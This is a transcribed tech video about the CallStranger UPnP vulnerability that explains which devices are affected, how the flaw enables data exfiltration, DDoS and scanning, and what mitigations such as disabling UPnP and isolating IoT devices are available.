 Tommy here from Orange Systems, and we're going to talk about Call Stranger, the terrible universal plug-and-play problem that was just discovered, and terrible? I don't know. That's probably not a good enough adjective to describe the level of problems that this is very likely to create, but I think if we get ahead of it, we're going to be able to mitigate it. Patches are available, but not everything is going to be patched. So we're going to talk about mitigation, not always patching. So there's ways to block this, and I'll talk about ways you can protect yourself from this as best you can. But first, if you'd like to learn more about me and my company, head over to LawrenceSystems.com if you'd like to hire a short project, there's a hires button right at the top. If you want to support this channel in other ways, there's affiliate links down below to get you deals and discounts on products and services we talk about on this channel, including a link to our Patreon if you like to become a Patreon supporter. We also have a swag store where you can get shirts and other items that are for sale, and that changes from time to time what's available and what's not. So go ahead and check that out frequently. And finally, our forums. If you'd like to have a more in-depth discussion about this video, suggestions for new videos, or just reach out, say hi and talk tech, our forums are a great place for that. Alright, now back to the content. So we'll start right here with CallStranger.com. Data exfiltration reflected, amplified, and TCP DDoS and port scan via UPNP subscribe callback. It's a triple threat. This one CVE 202012695 has three methodologies here. And they say billions of devices. And let me tell you show you why right here. Windows 10, probably all versions of Windows, including servers, UPNP host that DLL Xbox one. And then the list goes on from here. Asus, RT and 11, Belkin, WiIMO, Cisco, X100, Cisco X 3500, D-links, WPS routers. There's just a long list of these. HP DustChat, Photosmart, OfficeChat, MV, NEC. Yeah. And this is the list as of June 9th, 2020. This is going to be updated, they said, as they learn more devices. So how do we figure out if a device is vulnerable? Any good security researcher releases their code. And this is all available on GitHub. You can go through. It's all in Python. They have testing and, you know, they've really documented the whole schema and breaking down exactly how they did their testing. So they can, you know, go in here and dig into it and does, what a mess. And we'll play with the code later, maybe. But for right now, it's you can see it's just kind of a mess overall. Now there's a good write up over here at Blaping Computer on the same topic. Call stranger UMP and Pbug allows data theft, DDoS attacks and land scans. Now the way Universal Plug and Play works and why they said land scans, and this is one of those problems is it's allowing something to grab the Universal Plug and Play ports and change them. So if you're not fair with Universal Plug and Play, it is a security nightmare, but a consumer convenience. And what I mean by that is in the olden days of the internet, in the earlier days of me playing games, it was always, you know, going through the details and port forwarding things in your router to try to get a game to work. Well, obviously they wanted the gaming industry and other industries related to that needed port forwarding and all the different IoT devices now taking advantage of this. The UPNP was designed to just automatically and universally plug and play those ports. So you have an Xbox, for example, which is one of the vulnerable devices listed on here, and that Xbox would go talk to your router and say, I would like you to open these ports so we can play this game. And a router would say, no problem, let's go ahead. And the router firewall would open up the ports and away we go. Now you can see this is really convenient, because now I don't have to try to walk someone on the phone. Oh, to play this particular game, here's the list of ports. Here's all the settings, TCP, this and UDP that and port this and port that. And, you know, that's really challenging. And Universal Plug and Play solved that. And from anyone who's doing security research, it's just a place to keep poking at. Now, generally speaking, you're safe with UPNP, generally speaking, because the device needs to call out to play the game. So it does so in a manner by which talking on the inside of your network to make that external connection. Now, what this vulnerability is, what happens is some of these devices have it facing WAN and LAN. Or some people, for reasons beyond my knowledge, because it, well, there's not good security practice. I, you know, don't know the way to describe it, have put some of these devices with UPNP directly on networks, directly public facing on public IP addresses, essentially not behind firewalls, and some firewalls, some of the consumer ones and some of the devices also have this problem where they're listening on the other side, they're listening on the WAN port. So this allows all kinds of pivoting in and out of the network. And if these devices themselves that are behind a firewall also call out to a server and have that malformed information, they are going to perform what they referred to as a pivot. So they reached out, got bad information, pulled the call back, and then they can pivot within the network and essentially reflect and act like essentially like a cross-site scripting attack. And there's like a lot of little flaws that could go wrong here. Now, how do you protect yourself against it? And let's just scroll down here. We do have some mitigations and protections about it. So despite patches being available for almost two months, updating all devices is unlikely to happen anytime soon, if ever, which is just the fact of things. People don't update things. And if they don't auto update, no one bothers to load new firmware on their devices. It mainly depends on the vendors to implement, fix, and it takes time when dealing with the protocol of vulnerabilities. Furthermore, many devices will no longer be supported and are not able to receive updates. That's just common. These devices get out there, unless there's an extreme market pressure to do so. But let's talk about fixes. So not all UPNP stacks are available. There are a couple that are not. So there's going to be that issue that if you have a device, which is not easy to tell because this is a developer choice and you may not be aware of what the developer used to build the device you're using, but let's go down to the actual mitigations here. Disable unnecessary UPNP services, especially for internet-facing devices. Now, this is just a really important thing, and you may or may not be able to, depending on if you have a consumer device that has that ability. Check intranet and server networks to be sure UPNP devices, routers, IP cameras, printers, media, gateways, etc., are not allowing data exfiltration. That's going to be a little bit tricky, but I'm hoping that in most corporate networks that are properly configured, you shouldn't have UPNP devices in there able to open up ports. That's just definitely not a policy that you should allow. Go through network security logs and check if there's vulnerability that's been used as a threat actor. Contact your ISP, DDoS Protection vendor if there are solutions to block traffic generated by UPNP, subscribe, HUTB, notify. That last one is where I think we're going to see a lot of the mitigations. So a quick search on show Dan showed that there are about 5.4 million devices out there listening for UPNP requests. That's where we're going to see a major issue here. And many of these devices are probably owned by consumers, some of them owned by businesses that misconfigured them, or IT people in general who just did not configure these well. And we're probably going to see a bunch of mitigations coming directly from the ISPs. Not the first time this has happened. Years and years ago, when the internet started becoming more popular via cable modems and such, the first problem that was discovered rampantly was that, well, people were just plugging it right into their computer without a firewall and then publicly sharing their printers and publicly sharing their files. Whoops. Because years ago, that's just how things were and no one really put a lot of thought to it and Windows didn't even have a firewall by default back then. And the ISPs were quick to step to the rescue of all the fun that was being had of people sending things to random people's printers that they could just find publicly exposed internet, which unfortunately we still have printers exposed to the internet, but you'll see more filtering going on undoubtedly to help mitigate this because it causes a big burden of massive traffic going back and forth with a DDoS if all these are exposed and people send this mail formed packets on UPNP and turn these into basically just ready and waiting bots to go do something and make a bunch of noise on the internet. So my guess is we're going to see a massive amount of filtering, which is not necessarily a bad thing. That's how the ISPs solve the problem to some extent with the home users. The enterprise users where they're just getting a pipe and no filtering at all, that's where I'm hoping, I don't know all those 5.4 million how many of them are enterprise versus home, but boy at least some of them definitely are. So we'll see those devices hopefully just get knocked offline or something. I maybe someone will say, Hey, maybe we should fix this because they see some massive amount of traffic. I don't know. The good news is it's not as, I mean, it's bad, but it's not as bad in terms of your home users, your consumers, your devices are not going to turn against you and take over your network. Your toaster that you decided needed internet is probably not going to be that much of a problem. Those should still be, if you want to follow good security, those should still be on a separate network. And also, and I use my laptop as an example, my laptop comes into hostile networks all the time and this is running Linux, but you can do this the same with running Windows, turn the firewall on. You don't need, unless you really have a need, you don't necessarily need anything inbound on your computers to be listening. So if you are sharing a network with one of those devices, don't worry about it too much. If the Xbox is over there and it's on the same network, likelihood of them turning the Xbox to turn an attack to your Windows 10 computer, Windows 10 laptop or Linux laptop, pretty unlikely and those type of devices because they're well updated. If you have some random kind of off brand as cheap as you could find IoT devices, well, there you may have a problem. Keep those on a separate network if they need internet. They're the most likely to be vulnerable from things like this because many of those devices, when it's a race to the bottom of price, one of the things quickly sacrifices any type of firmware updates, proper vetting that they even used a more modern stack or any security validating of the device ever. It was basically done is lowest bidder. How cheap can we get this thing working? Don't worry about just using the same password on all of them. And those are always going to be flaws that are out there and one of the dangers of putting all those random devices out there on the internet like that. So I'll leave the links to the Bleeping Computer article, the CallStranger.com and the list of updates. So if you have one of those devices listed on the vulnerable list, see if there's a firmware update. If you have a commercial firewall and I'll throw out there because I do a lot of videos on PF Sense by default, PF Sense and many other commercial firewalls do not have UPNP enabled at all. It is something you have to forcibly enable. Alternatively, if you didn't want UPNP because you had it on previously because you wanted some game system to automatically talk to your router and put you decided maybe that's not the best idea, even though it's really convenient, you could also just look at manually mapping ports in there. That's another way to kind of mitigate this in case there's any further problems found with UPNP. Those are my thoughts. Go ahead and read up on it here. I'll keep you updated if there's something more to it. But for now, we'll see how many of those 5.4 million devices get turned into some type of major botnet and cause chaos on the internet. It's a matter of time now that the research is out there or it's could have been already being done and this research is just highlighting it. We'll figure that out. It's always better to know and patch than keep this all a secret. It's about getting the information out there. Thanks. And thank you for making it to the end of the video. If you like this video, please give it a thumbs up. If you'd like to see more content from the channel, hit the subscribe button and hit the bell icon. If you like YouTube to notify you when new videos come out. If you'd like to hire us, head over to laurancesystems.com, fill out our contact page and let us know what we can help you with and what projects you'd like us to work together on. If you want to carry on the discussion, head over to forums.laurancesystems.com where we can carry on the discussion about this video, other videos, or other tech topics in general. Even suggestions for new videos, they're accepted right there on our forums, which are free. Also, if you'd like to help the channel out in other ways, head over to our affiliate page. We have a lot of great tech offers for you and once again, thanks for watching and see you next time.